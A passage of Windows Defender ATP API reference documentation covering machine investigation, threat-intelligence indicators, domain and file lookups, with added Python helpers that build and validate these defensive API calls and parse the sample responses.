  "machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
  "creationDateTimeUtc": "2018-12-04T12:15:04.3825985Z",
  "lastUpdateTimeUtc": "2018-12-04T12:15:04.3825985Z",
  "relatedFileInfo": {
    "fileIdentifier": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9",
    "fileIdentifierType": "Sha1"
  }
}
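The following is an added example, not code from this page or from Microsoft, showing how automation would build the Stop and Quarantine call described above and read back the Machine Action it returns. It assumes only the request and response shapes documented on this page; the bearer token is a placeholder and the sample response is constructed in the shape of the page's example. Because this is a remediation action that deletes a file on an endpoint, the helper validates the machine id and SHA-1 locally and refuses an empty comment, and after the call it confirms that the returned action really references the hash that was requested.

```python
"""Stop and Quarantine File via the Windows Defender ATP machine-action API.

Added example, not code from the original page or from Microsoft. It assumes
only the request and response shapes documented above; the bearer token and
the sample response below are constructed placeholders.
"""
import json
import re
from urllib.request import Request, urlopen

API_BASE = "https://api.securitycenter.windows.com"  # api-us/-eu/-uk also work
HEX40 = re.compile(r"^[0-9a-fA-F]{40}$")  # machine id and SHA-1 are both 40 hex chars


def build_stop_and_quarantine(token, machine_id, sha1, comment):
    """Return the POST /api/machines/{id}/StopAndQuarantineFile call as a dict.

    Inputs are validated client-side: a malformed hash or an empty comment is
    rejected before any remediation action is created on the machine.
    """
    if not HEX40.match(machine_id):
        raise ValueError("machine id must be 40 hex characters")
    if not HEX40.match(sha1):
        raise ValueError("Sha1 must be 40 hex characters")
    if not comment.strip():
        raise ValueError("Comment is required; record the alert or ticket that justifies the action")
    return {
        "method": "POST",
        "url": f"{API_BASE}/api/machines/{machine_id}/StopAndQuarantineFile",
        "headers": {"Authorization": f"Bearer {token}",
                    "Content-Type": "application/json"},
        "json": {"Comment": comment, "Sha1": sha1.lower()},
    }


def parse_machine_action(status_code, body_text, expected_sha1):
    """Interpret the 201 response: return the MachineAction id and whether the
    action is still running, and check it targets the hash we asked for."""
    if status_code != 201:
        raise RuntimeError(f"expected 201 Created, got {status_code}: {body_text[:200]}")
    action = json.loads(body_text)
    related = action.get("relatedFileInfo") or {}
    if related.get("fileIdentifierType") != "Sha1" or \
            (related.get("fileIdentifier") or "").lower() != expected_sha1.lower():
        raise RuntimeError("response does not reference the requested SHA-1")
    return {
        "action_id": action["id"],
        "type": action["type"],
        "machine_id": action["machineId"],
        "in_progress": action["status"] == "InProgress",
        "requestor": action["requestor"].strip(),
    }


def send(call):
    """Send a call built above with urllib (needs network access and a valid token)."""
    req = Request(call["url"], data=json.dumps(call["json"]).encode(),
                  headers=call["headers"], method=call["method"])
    with urlopen(req) as resp:
        return resp.status, resp.read().decode()


# Constructed sample response in the same shape as the page's example.
SAMPLE_RESPONSE = json.dumps({
    "@odata.context": API_BASE + "/api/$metadata#MachineActions/$entity",
    "id": "141408d1-384c-4c19-8b57-ba39e378011a",
    "type": "StopAndQuarantineFile",
    "requestor": "Analyst@contoso.com",
    "requestorComment": "Stop and quarantine file on machine due to alert 441688558380765161_2136280442",
    "status": "InProgress",
    "machineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
    "creationDateTimeUtc": "2018-12-04T12:15:04.3825985Z",
    "lastUpdateTimeUtc": "2018-12-04T12:15:04.3825985Z",
    "relatedFileInfo": {"fileIdentifier": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9",
                        "fileIdentifierType": "Sha1"},
})

if __name__ == "__main__":
    call = build_stop_and_quarantine("<token>", "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
                                     "87662bc3d60e4200ceaf7aae249d1c343f4b83c9",
                                     "Stop and quarantine file on machine due to alert 441688558380765161_2136280442")
    # send(call) would perform the real request; here the constructed response is parsed instead
    print(parse_machine_action(201, SAMPLE_RESPONSE, call["json"]["Sha1"]))
```

The returned MachineAction is only the acknowledgement that the action was queued (status InProgress); whether the file was actually stopped and removed has to be read from the action's later status, so keep the action id with the alert record that justified it.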
Initiate machine investigation API (Preview)
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Initiates an automated investigation (AutoIR) on a machine.

NOTE
This page focuses on performing an automated investigation on a machine. See Automated Investigation for more
information.

Limitations
1. The number of executions is limited (up to 5 calls per hour).
2. For Automated Investigation limitations, see Automated Investigation.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION           PERMISSION DISPLAY NAME
Application                         Alert.ReadWrite.All  'Read and write all alerts'
Delegated (work or school account)  Alert.ReadWrite      'Read and write alerts'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'Alerts Investigation' (see Create and manage roles for more information).
- The user needs to have access to the machine, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
POST https://api.securitycenter.windows.com/api/machines/{id}/InitiateInvestigation

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER  TYPE    DESCRIPTION
Comment    String  Comment to associate with the action. Required.

Response
If successful, this method returns a 200 OK response code with an object that holds the investigation ID in the "value"
property. If the machine is not found, 404 Not Found.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/machines/fb9ab6be3965095a09c057be7c90f0a2/InitiateInvestigation
Content-type: application/json
{
  "Comment": "Initiate an investigation on machine fb9ab6be3965095a09c057be7c90f0a2"
}

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Edm.Int64",
  "value": 5146
}
Indicator resource type
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Methods
METHOD            RETURN TYPE           DESCRIPTION
List Indicators   Indicator Collection  Lists Indicator entities.
Submit Indicator  Indicator             Submits an Indicator entity.
Delete Indicator  No Content            Deletes an Indicator entity.

Properties
PROPERTY                 TYPE             DESCRIPTION
indicatorValue           String           Identity of the Indicator entity.
indicatorType            Enum             Type of the indicator. Possible values are: "FileSha1", "FileSha256", "IpAddress", "DomainName" and "Url".
title                    String           Indicator alert title.
creationTimeDateTimeUtc  DateTimeOffset   The date and time when the indicator was created.
createdBy                String           Identity of the user/application that submitted the indicator.
expirationTime           DateTimeOffset   The expiration time of the indicator.
action                   Enum             The action that will be taken if the indicator is discovered in the organization. Possible values are: "Alert", "AlertAndBlock", and "Allowed".
severity                 Enum             The severity of the indicator. Possible values are: "Informational", "Low", "Medium" and "High".
description              String           Description of the indicator.
recommendedActions       String           Indicator alert recommended actions.
rbacGroupNames           List of strings  RBAC group names where the indicator is exposed. Empty list if the indicator is exposed to all groups.
Submit or Update Indicator API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

NOTE
Currently this API is supported only for AppOnly context requests. (See Get access with application context for more
information.)

Submits a new Indicator entity or updates an existing one.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Get started.

PERMISSION TYPE  PERMISSION        PERMISSION DISPLAY NAME
Application      Ti.ReadWrite      'Read and write Indicators'
Application      Ti.ReadWrite.All  'Read and write All Indicators'

HTTP request
POST https://api.securitycenter.windows.com/api/indicators

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.
Content-Type   String  application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

PARAMETER           TYPE            DESCRIPTION
indicatorValue      String          Identity of the Indicator entity. Required.
indicatorType       Enum            Type of the indicator. Possible values are: "FileSha1", "FileSha256", "IpAddress", "DomainName" and "Url". Required.
action              Enum            The action that will be taken if the indicator is discovered in the organization. Possible values are: "Alert", "AlertAndBlock", and "Allowed". Required.
title               String          Indicator alert title. Optional.
expirationTime      DateTimeOffset  The expiration time of the indicator. Optional.
severity            Enum            The severity of the indicator. Possible values are: "Informational", "Low", "Medium" and "High". Optional.
description         String          Description of the indicator. Optional.
recommendedActions  String          TI indicator alert recommended actions. Optional.

Response
If successful, this method returns a 200 OK response code and the created or updated Indicator entity in the
response body.
If not successful, this method returns 400 Bad Request or 409 Conflict with the failure reason. Bad Request
usually indicates an incorrect body, and Conflict can happen if you try to submit an Indicator that conflicts with an
existing Indicator's type or action.

Example
Request
Here is an example of the request.

POST https://api.securitycenter.windows.com/api/indicators
Content-type: application/json
{
  "indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
  "indicatorType": "FileSha1",
  "title": "test",
  "expirationTime": "2020-12-12T00:00:00Z",
  "action": "AlertAndBlock",
  "severity": "Informational",
  "description": "test",
  "recommendedActions": "TEST"
}

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Indicators/$entity",
  "indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
  "indicatorType": "FileSha1",
  "title": "test",
  "creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
  "createdBy": "45097602-1234-5678-1234-9f453233e62c",
  "expirationTime": "2020-12-12T00:00:00Z",
  "action": "AlertAndBlock",
  "severity": "Informational",
  "description": "test",
  "recommendedActions": "TEST",
  "rbacGroupNames": []
}
List Indicators API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

NOTE
Currently this API is supported only for AppOnly context requests. (See Get access with application context for more
information.)

Gets a collection of TI Indicators.
The Get TI Indicators collection API supports OData V4 queries.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Get started.

PERMISSION TYPE  PERMISSION        PERMISSION DISPLAY NAME
Application      Ti.ReadWrite      'Read and write Indicators'
Application      Ti.ReadWrite.All  'Read and write All Indicators'

HTTP request
GET https://api.securitycenter.windows.com/api/indicators

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns a 200 OK response code with a collection of Indicator entities.

NOTE
If the Application has the 'Ti.ReadWrite.All' permission, it is exposed to all Indicators. Otherwise, it is exposed only to the
Indicators it created.

Example 1
Request
Here is an example of a request that gets all Indicators.

GET https://api.securitycenter.windows.com/api/indicators

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Indicators",
  "value": [
    {
      "indicatorValue": "12.13.14.15",
      "indicatorType": "IpAddress",
      "title": "test",
      "creationTimeDateTimeUtc": "2018-10-24T11:15:35.3688259Z",
      "createdBy": "45097602-1234-5678-1234-9f453233e62c",
      "expirationTime": "2020-12-12T00:00:00Z",
      "action": "Alert",
      "severity": "Informational",
      "description": "test",
      "recommendedActions": "test",
      "rbacGroupNames": []
    },
    {
      "indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
      "indicatorType": "FileSha1",
      "title": "test",
      "creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
      "createdBy": "45097602-1234-5678-1234-9f453233e62c",
      "expirationTime": "2020-12-12T00:00:00Z",
      "action": "AlertAndBlock",
      "severity": "Informational",
      "description": "test",
      "recommendedActions": "TEST",
      "rbacGroupNames": [ "Group1", "Group2" ]
    }
    ...
  ]
}

Example 2
Request
Here is an example of a request that gets all Indicators with the 'AlertAndBlock' action.

GET https://api.securitycenter.windows.com/api/indicators?$filter=action eq 'AlertAndBlock'

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Indicators",
  "value": [
    {
      "indicatorValue": "220e7d15b0b3d7fac48f2bd61114db1022197f7f",
      "indicatorType": "FileSha1",
      "title": "test",
      "creationTimeDateTimeUtc": "2018-10-24T10:54:23.2009016Z",
      "createdBy": "45097602-1234-5678-1234-9f453233e62c",
      "expirationTime": "2020-12-12T00:00:00Z",
      "action": "AlertAndBlock",
      "severity": "Informational",
      "description": "test",
      "recommendedActions": "TEST",
      "rbacGroupNames": [ "Group1", "Group2" ]
    }
    ...
  ]
}
Delete Indicator API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

NOTE
Currently this API is only supported for AppOnly context requests. (See Get access with application context for more
information.)

Deletes an Indicator entity by ID.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Get started.

PERMISSION TYPE  PERMISSION        PERMISSION DISPLAY NAME
Application      Ti.ReadWrite      'Read and write TI Indicators'
Application      Ti.ReadWrite.All  'Read and write Indicators'

HTTP request
DELETE https://api.securitycenter.windows.com/api/indicators/{id}

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If the Indicator exists and is deleted successfully, 204 No Content. If an Indicator with the specified id is not found,
404 Not Found.

Example
Request
Here is an example of the request.

DELETE https://api.securitycenter.windows.com/api/indicators/220e7d15b0b3d7fac48f2bd61114db1022197f7f

Response
Here is an example of the response.



Get domain related alerts API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of alerts related to a given domain address.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION           PERMISSION DISPLAY NAME
Application                         Alert.Read.All       'Read all alerts'
Application                         Alert.ReadWrite.All  'Read and write all alerts'
Delegated (work or school account)  Alert.Read           'Read alerts'
Delegated (work or school account)  Alert.ReadWrite      'Read and write alerts'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
- The response includes only alerts associated with machines that the user has access to, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/domains/{domain}/alerts

Request headers

HEADER         VALUE
Authorization  Bearer {token}. Required.

Request body
Empty

Response
If successful and the domain exists, 200 OK with a list of alert entities. If the domain does not exist, 404 Not Found.

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/domains/client.wns.windows.com/alerts

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
  "value": [
    {
      "id": "441688558380765161_2136280442",
      "incidentId": 8633,
      "assignedTo": "secop@contoso.com",
      "severity": "Low",
      "status": "InProgress",
      "classification": "TruePositive",
      "determination": "Malware",
      "investigationState": "Running",
      "category": "MalwareDownload",
      "detectionSource": "WindowsDefenderAv",
      "threatFamilyName": "Mikatz",
      "title": "Windows Defender AV detected 'Mikatz', high-severity malware",
      "description": "Some description",
      "alertCreationTime": "2018-11-25T16:19:21.8409809Z",
      "firstEventTime": "2018-11-25T16:17:50.0948658Z",
      "lastEventTime": "2018-11-25T16:18:01.809871Z",
      "resolvedTime": null,
      "machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
    },
    {
      "id": "121688558380765161_2136280442",
      "incidentId": 4123,
      "assignedTo": "secop@contoso.com",
      "severity": "Low",
      "status": "InProgress",
      "classification": "TruePositive",
      "determination": "Malware",
      "investigationState": "Running",
      "category": "MalwareDownload",
      "detectionSource": "WindowsDefenderAv",
      "threatFamilyName": "Mikatz",
      "title": "Windows Defender AV detected 'Mikatz', high-severity malware",
      "description": "Some description",
      "alertCreationTime": "2018-11-24T16:19:21.8409809Z",
      "firstEventTime": "2018-11-24T16:17:50.0948658Z",
      "lastEventTime": "2018-11-24T16:18:01.809871Z",
      "resolvedTime": null,
      "machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
    }
  ]
}
Get domain related machines API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of machines that have communicated to or from a given domain address.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION             PERMISSION DISPLAY NAME
Application                         Machine.Read.All       'Read all machine profiles'
Application                         Machine.ReadWrite.All  'Read and write all machine information'
Delegated (work or school account)  Machine.Read           'Read machine information'
Delegated (work or school account)  Machine.ReadWrite      'Read and write machine information'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
- The response includes only machines that the user can access, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/domains/{domain}/machines

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful and the domain exists, 200 OK with a list of machine entities. If the domain does not exist, 404 Not Found.

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/domains/api.securitycenter.windows.com/machines

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
  "value": [
    {
      "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
      "computerDnsName": "mymachine1.contoso.com",
      "firstSeen": "2018-08-02T14:55:03.7791856Z",
      "lastSeen": "2018-08-02T14:55:03.7791856Z",
      "osPlatform": "Windows10",
      "osVersion": "10.0.0.0",
      "lastIpAddress": "172.17.230.209",
      "lastExternalIpAddress": "167.220.196.71",
      "agentVersion": "10.5830.18209.1001",
      "osBuild": 18209,
      "healthStatus": "Active",
      "rbacGroupId": 140,
      "rbacGroupName": "The-A-Team",
      "riskScore": "Low",
      "aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
      "machineTags": [ "test tag 1", "test tag 2" ]
    },
    {
      "id": "7292e4b8cb74ff1cc3d8a495eb29dc8858b732f7",
      "computerDnsName": "mymachine2.contoso.com",
      "firstSeen": "2018-07-09T13:22:45.1250071Z",
      "lastSeen": "2018-07-09T13:22:45.1250071Z",
      "osPlatform": "Windows10",
      "osVersion": "10.0.0.0",
      "lastIpAddress": "192.168.12.225",
      "lastExternalIpAddress": "79.183.65.82",
      "agentVersion": "10.5820.17724.1000",
      "osBuild": 17724,
      "healthStatus": "Inactive",
      "rbacGroupId": 140,
      "rbacGroupName": "The-A-Team",
      "riskScore": "Low",
      "aadDeviceId": null,
      "machineTags": [ "test tag 1" ]
    }
  ]
}
Get domain statistics API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves the prevalence for the given domain.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION    PERMISSION DISPLAY NAME
Application                         URL.Read.All  'Read URLs'
Delegated (work or school account)  URL.Read.All  'Read URLs'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).

HTTP request
GET /api/domains/{domain}/stats

Request headers

HEADER         VALUE
Authorization  Bearer {token}. Required.

Request body
Empty

Response
If successful and the domain exists, 200 OK with a statistics object in the response body. If the domain does not exist,
404 Not Found.

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/domains/example.com/stats

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgDomainStats",
  "host": "example.com",
  "orgPrevalence": "4070",
  "orgFirstSeen": "2017-07-30T13:23:48Z",
  "orgLastSeen": "2017-08-29T13:09:05Z"
}
Was domain seen in org
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Answers whether a domain was seen in the organization.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION    PERMISSION DISPLAY NAME
Application                         Url.Read.All  'Read URLs'
Delegated (work or school account)  URL.Read.All  'Read URLs'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).

HTTP request
GET /api/domains/{domain}

Request headers

HEADER         VALUE
Authorization  Bearer {token}. Required.

Request body
Empty

Response
If successful and the domain exists, 200 OK. If the domain does not exist, 404 Not Found.

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/domains/example.com
Content-type: application/json

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Domains/$entity",
  "host": "example.com"
}
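The two domain lookups above, Was domain seen in org and Get domain statistics, are usually asked together during triage: first whether the organization has any contact with a domain at all (200 versus 404), then how widely and for how long. The following is an added example, not code from this page or from Microsoft, that builds both URLs, maps the existence check onto a boolean, and normalizes the statistics object (note that the documented example carries orgPrevalence as a string). It assumes only the endpoints and response shapes on these pages; SAMPLE_STATS is the page's example response, SAMPLE_RARE and the reference time are constructed, and the rarity thresholds in classify are assumptions to tune per tenant, included to show how prevalence and first-seen age are read together.

```python
"""Answer "has this domain been seen in the org?" and read its statistics.

Added example serving the Get domain statistics and Was domain seen in org
pages above; it is not code from the page or from Microsoft. It assumes only
the two documented endpoints and response shapes. SAMPLE_STATS is the page's
example response; SAMPLE_RARE and NOW are constructed, and the thresholds in
classify() are assumptions.
"""
import json
from datetime import datetime, timezone
from urllib.parse import quote

API_BASE = "https://api.securitycenter.windows.com"


def domain_url(domain, suffix=""):
    """/api/domains/{domain} or /api/domains/{domain}/stats; the domain is one path segment."""
    return f"{API_BASE}/api/domains/{quote(domain, safe='')}{suffix}"


def seen_in_org(status_code):
    """GET /api/domains/{domain}: 200 means the domain was seen, 404 means it was not."""
    if status_code == 200:
        return True
    if status_code == 404:
        return False
    raise RuntimeError(f"unexpected status {status_code}")


def _utc(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_stats(body_text, now):
    """Normalize the InOrgDomainStats object: orgPrevalence is a string in the
    documented example, so it is converted to int; durations are whole days."""
    stats = json.loads(body_text)
    first, last = _utc(stats["orgFirstSeen"]), _utc(stats["orgLastSeen"])
    return {
        "host": stats["host"],
        "orgPrevalence": int(stats["orgPrevalence"]),
        "days_observed": (last - first).days,
        "days_since_last_seen": (now - last).days,
    }


def classify(stats, rare_threshold=10, recent_days=7):
    """Assumed, tunable heuristic: a domain that few machines have contacted and
    that first appeared recently deserves a look before one contacted org-wide
    for months."""
    rare = stats["orgPrevalence"] <= rare_threshold
    new = stats["days_observed"] <= recent_days
    if rare and new:
        return "rare-and-new"
    if rare:
        return "rare"
    return "common"


SAMPLE_STATS = json.dumps({  # the page's example response
    "@odata.context": API_BASE + "/api/$metadata#microsoft.windowsDefenderATP.api.InOrgDomainStats",
    "host": "example.com",
    "orgPrevalence": "4070",
    "orgFirstSeen": "2017-07-30T13:23:48Z",
    "orgLastSeen": "2017-08-29T13:09:05Z",
})
SAMPLE_RARE = json.dumps({  # constructed: three machines, first contact two days before NOW
    "host": "rare.example.net",
    "orgPrevalence": "3",
    "orgFirstSeen": "2019-04-20T08:00:00Z",
    "orgLastSeen": "2019-04-22T09:30:00Z",
})
NOW = datetime(2019, 4, 22, 12, 0, tzinfo=timezone.utc)  # constructed reference time

if __name__ == "__main__":
    print(domain_url("example.com"), domain_url("example.com", "/stats"))
    print("seen:", seen_in_org(200), "not seen:", seen_in_org(404))
    for body in (SAMPLE_STATS, SAMPLE_RARE):
        stats = parse_stats(body, NOW)
        print(stats, classify(stats))
```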
File resource type
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Represents a file entity in Windows Defender ATP.

Methods
METHOD                      RETURN TYPE         DESCRIPTION
Get file                    file                Get a single file.
List file related alerts    alert collection    Get the alert entities that are associated with the file.
List file related machines  machine collection  Get the machine entities associated with the file.
file statistics             Statistics summary  Retrieves the prevalence for the given file.

Properties
PROPERTY             TYPE            DESCRIPTION
sha1                 String          SHA-1 hash of the file content.
sha256               String          SHA-256 hash of the file content.
md5                  String          MD5 hash of the file content.
globalPrevalence     Integer         File prevalence across the organization.
globalFirstObserved  DateTimeOffset  First time the file was observed.
globalLastObserved   DateTimeOffset  Last time the file was observed.
size                 Integer         Size of the file.
fileType             String          Type of the file.
isPeFile             Boolean         true if the file is a portable executable (e.g. "DLL", "EXE", etc.).
filePublisher        String          File publisher.
fileProductName      String          Product name.
signer               String          File signer.
issuer               String          File issuer.
signerHash           String          Hash of the signing certificate.
isValidCertificate   Boolean         Whether the signing certificate was successfully verified by the Windows Defender ATP agent.
Get file information API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a file by identifier (SHA-1, SHA-256, or MD5 hash).

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION     PERMISSION DISPLAY NAME
Application                         File.Read.All  'Read all file profiles'
Delegated (work or school account)  File.Read.All  'Read all file profiles'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).

HTTP request
GET /api/files/{id}

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful and the file exists, 200 OK with the file entity in the body. If the file does not exist, 404 Not Found.

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Files/$entity",
  "sha1": "6532ec91d513acc05f43ee0aa3002599729fd3e1",
  "sha256": "d4447dffdbb2889b4b4e746b0bc882df1b854101614b0aa83953ef3cb66904cf",
  "md5": "7f05a371d2beffb3784fd2199f81d730",
  "globalPrevalence": 7329,
  "globalFirstObserved": "2018-04-08T05:50:29.4459725Z",
  "globalLastObserved": "2018-08-07T23:35:11.1361328Z",
  "windowsDefenderAVThreatName": null,
  "size": 391680,
  "fileType": "PortableExecutable",
  "isPeFile": true,
  "filePublisher": null,
  "fileProductName": null,
  "signer": null,
  "issuer": null,
  "signerHash": null,
  "isValidCertificate": null
}
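An added example, not code from this page or from Microsoft, for the File resource type and the Get file information call above. It classifies the identifier the endpoint accepts (MD5, SHA-1 or SHA-256, told apart by hex length) before building the URL, and turns the documented File properties into triage flags: an unsigned portable executable, a signature the agent could not verify (isValidCertificate false, which is different from null, where nothing was evaluated), low global prevalence, and an existing Windows Defender AV detection. It assumes only the /api/files/{id} endpoint and the properties on this page; SAMPLE_FILE is the page's example response, SAMPLE_SUSPECT and the prevalence threshold are constructed.

```python
"""Look up a file entity by hash and flag properties worth an analyst's attention.

Added example for the File resource type and Get file information pages above;
not code from the page or from Microsoft. It assumes only the /api/files/{id}
endpoint and the File properties documented there. SAMPLE_FILE is the page's
example response; SAMPLE_SUSPECT and the rare_threshold default are constructed.
"""
import json
import re

API_BASE = "https://api.securitycenter.windows.com"
HASH_TYPES = {32: "MD5", 40: "Sha1", 64: "Sha256"}  # hex digest length -> identifier type


def hash_type(identifier):
    """Classify the identifier the endpoint accepts (MD5, SHA-1 or SHA-256) or reject it."""
    if not re.fullmatch(r"[0-9a-fA-F]+", identifier) or len(identifier) not in HASH_TYPES:
        raise ValueError("identifier must be a hex MD5 (32), SHA-1 (40) or SHA-256 (64) digest")
    return HASH_TYPES[len(identifier)]


def file_url(identifier):
    """GET /api/files/{id}, validating the hash before the request is built."""
    hash_type(identifier)
    return f"{API_BASE}/api/files/{identifier.lower()}"


def assess(body_text, rare_threshold=100):
    """Return the file's hashes plus flags derived from the documented properties:
    unsigned-pe       a portable executable with no signer
    invalid-signature isValidCertificate is false (null means no signature was evaluated)
    low-prevalence    globalPrevalence below rare_threshold (assumed threshold)
    av-detection      windowsDefenderAVThreatName is set
    """
    f = json.loads(body_text)
    flags = []
    if f.get("isPeFile") and not f.get("signer"):
        flags.append("unsigned-pe")
    if f.get("isValidCertificate") is False:
        flags.append("invalid-signature")
    if f.get("globalPrevalence") is not None and f["globalPrevalence"] < rare_threshold:
        flags.append("low-prevalence")
    if f.get("windowsDefenderAVThreatName"):
        flags.append("av-detection")
    return {"sha1": f["sha1"], "sha256": f.get("sha256"), "md5": f.get("md5"),
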